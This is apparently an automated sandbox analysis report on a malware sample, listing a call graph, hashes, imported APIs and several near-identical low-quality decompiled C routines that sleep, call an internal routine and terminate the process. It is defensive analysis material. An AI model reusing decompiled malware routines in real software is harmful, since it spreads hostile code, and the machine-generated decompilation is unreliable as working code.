                          • Instruction ID: 3997b8332eafcfadacae3ac48453c932a61b1ab10ebe85974d32353d2488128b
                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                          • Instruction Fuzzy Hash: D7113F79A00208EFDB01DF98C985E98BBF5EF08350F198094FA489B361D375EA50DF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Callgraph

                          • Executed
                          • Not Executed
                          • Opacity -> Relevance
                          • Disassembly available
                          callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                          Control-flow Graph

                          C-Code - Quality: 23%
                          			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                          				char _v8;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t11;
                          				void* _t16;
                          				intOrPtr* _t17;
                          				void* _t19;
                          				void* _t20;
                          				void* _t21;
                          
                          				_t22 = __eflags;
                          				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                          				_t17 = _a4;
                          				Sleep(0x1388);
                          				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                          				if(_t11 != 0) {
                          					_push(_a16);
                          					_push(_v8);
                          					_push(_t11);
                          					_push(_t17); // executed
                          					L00401455(0x60, _t19, _t20); // executed
                          				}
                          				 *_t17(0xffffffff, 0); // executed
                          				_t17 = _t17 + 0x60;
                          				_push(0x60);
                          				asm("pushad");
                          				__ecx =  *__esp;
                          				__esp = __esp + 4;
                          				return __eax;
                          			}














                          0x0040180c
                          0x00401839
                          0x0040183e
                          0x00401846
                          0x00401854
                          0x0040185b
                          0x0040185d
                          0x00401860
                          0x00401863
                          0x00401864
                          0x00401865
                          0x00401865
                          0x0040186e
                          0x0040187a
                          0x0040188a
                          0x0040188b
                          0x0040188c
                          0x0040188f
                          0x004018a2

                          APIs
                          • Sleep.KERNELBASE(00001388), ref: 00401846
                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                          Memory Dump Source
                          • Source File: 0000000B.00000002.408248709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_400000_rudwagu.jbxd
                          Similarity
                          • API ID: ProcessSleepTerminate
                          • String ID:
                          • API String ID: 417527130-0
                          • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                          • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                          • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                          • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • Sleep.KERNELBASE(00001388), ref: 00401846
                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                          Memory Dump Source
                          • Source File: 0000000B.00000002.408248709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_400000_rudwagu.jbxd
                          Similarity
                          • API ID: ProcessSleepTerminate
                          • String ID:
                          • API String ID: 417527130-0
                          • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                          • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                          • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                          • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 17%
                          			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                          				void* _t11;
                          				intOrPtr* _t17;
                          				void* _t19;
                          				void* _t22;
                          
                          				_t23 = __eflags;
                          				asm("out 0x95, eax");
                          				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                          				_t17 =  *((intOrPtr*)(_t22 + 8));
                          				Sleep(0x1388);
                          				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                          				if(_t11 != 0) {
                          					_push( *((intOrPtr*)(_t22 + 0x14)));
                          					_push( *((intOrPtr*)(_t22 - 4)));
                          					_push(_t11);
                          					_push(_t17); // executed
                          					L00401455(0x60, _t19, __edi); // executed
                          				}
                          				 *_t17(0xffffffff, 0); // executed
                          				_t17 = _t17 + 0x60;
                          				_push(0x60);
                          				asm("pushad");
                          				__ecx =  *__esp;
                          				__esp = __esp + 4;
                          				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                          				_pop(__edi);
                          				_pop(__esi);
                          				_pop(__ebx);
                          				__esp = __ebp;
                          				_pop(__ebp);
                          				return __eax;
                          			}







                          0x00401822
                          0x00401822
                          0x00401839
                          0x0040183e
                          0x00401846
                          0x00401854
                          0x0040185b
                          0x0040185d
                          0x00401860
                          0x00401863
                          0x00401864
                          0x00401865
                          0x00401865
                          0x0040186e
                          0x0040187a
                          0x0040188a
                          0x0040188b
                          0x0040188c
                          0x0040188f
                          0x00401899
                          0x0040189e
                          0x0040189f
                          0x004018a0
                          0x004018a1
                          0x004018a1
                          0x004018a2

                          APIs
                          • Sleep.KERNELBASE(00001388), ref: 00401846
                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                          Memory Dump Source
                          • Source File: 0000000B.00000002.408248709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_400000_rudwagu.jbxd
                          Similarity
                          • API ID: ProcessSleepTerminate
                          • String ID:
                          • API String ID: 417527130-0
                          • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                          • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                          • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                          • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 17%
                          			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                          				void* _t8;
                          				void* _t11;
                          				intOrPtr* _t17;
                          				void* _t19;
                          				void* _t22;
                          
                          				_t23 = __eflags;
                          				asm("sbb ebx, ebp");
                          				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                          				_t17 =  *((intOrPtr*)(_t22 + 8));
                          				Sleep(0x1388);
                          				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                          				if(_t11 != 0) {
                          					_push( *((intOrPtr*)(_t22 + 0x14)));
                          					_push( *((intOrPtr*)(_t22 - 4)));
                          					_push(_t11);
                          					_push(_t17); // executed
                          					L00401455(0x60, _t19, __edi); // executed
                          				}
                          				 *_t17(0xffffffff, 0); // executed
                          				_t17 = _t17 + 0x60;
                          				_push(0x60);
                          				asm("pushad");
                          				__ecx =  *__esp;
                          				__esp = __esp + 4;
                          				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                          				_pop(__edi);
                          				_pop(__esi);
                          				_pop(__ebx);
                          				__esp = __ebp;
                          				_pop(__ebp);
                          				return __eax;
                          			}








                          0x00401826
                          0x00401826
                          0x00401839
                          0x0040183e
                          0x00401846
                          0x00401854
                          0x0040185b
                          0x0040185d
                          0x00401860
                          0x00401863
                          0x00401864
                          0x00401865
                          0x00401865
                          0x0040186e
                          0x0040187a
                          0x0040188a
                          0x0040188b
                          0x0040188c
                          0x0040188f
                          0x00401899
                          0x0040189e
                          0x0040189f
                          0x004018a0
                          0x004018a1
                          0x004018a1
                          0x004018a2

                          APIs
                          • Sleep.KERNELBASE(00001388), ref: 00401846
                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                          Memory Dump Source
                          • Source File: 0000000B.00000002.408248709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_400000_rudwagu.jbxd
                          Similarity
                          • API ID: ProcessSleepTerminate
                          • String ID:
                          • API String ID: 417527130-0
                          • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                          • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                          • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                          • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 20%
                          			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                          				void* _t10;
                          				void* _t13;
                          				intOrPtr* _t19;
                          				void* _t22;
                          				void* _t25;
                          
                          				_t26 = __eflags;
                          				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                          				_t19 =  *((intOrPtr*)(_t25 + 8));
                          				Sleep(0x1388);
                          				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                          				if(_t13 != 0) {
                          					_push( *((intOrPtr*)(_t25 + 0x14)));
                          					_push( *((intOrPtr*)(_t25 - 4)));
                          					_push(_t13);
                          					_push(_t19); // executed
                          					L00401455(0x60, _t22, __edi); // executed
                          				}
                          				 *_t19(0xffffffff, 0); // executed
                          				_t19 = _t19 + 0x60;
                          				_push(0x60);
                          				asm("pushad");
                          				__ecx =  *__esp;
                          				__esp = __esp + 4;
                          				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                          				_pop(__edi);
                          				_pop(__esi);
                          				_pop(__ebx);
                          				__esp = __ebp;
                          				_pop(__ebp);
                          				return __eax;
                          			}








                          0x00401834
                          0x00401839
                          0x0040183e
                          0x00401846
                          0x00401854
                          0x0040185b
                          0x0040185d
                          0x00401860
                          0x00401863
                          0x00401864
                          0x00401865
                          0x00401865
                          0x0040186e
                          0x0040187a
                          0x0040188a
                          0x0040188b
                          0x0040188c
                          0x0040188f
                          0x00401899
                          0x0040189e
                          0x0040189f
                          0x004018a0
                          0x004018a1
                          0x004018a1
                          0x004018a2

                          APIs
                          • Sleep.KERNELBASE(00001388), ref: 00401846
                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                          Memory Dump Source
                          • Source File: 0000000B.00000002.408248709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_11_2_400000_rudwagu.jbxd
                          Similarity
                          • API ID: ProcessSleepTerminate
                          • String ID:
                          • API String ID: 417527130-0
                          • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                          • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                          • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                          • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                          Uniqueness

                          Uniqueness Score: -1.00%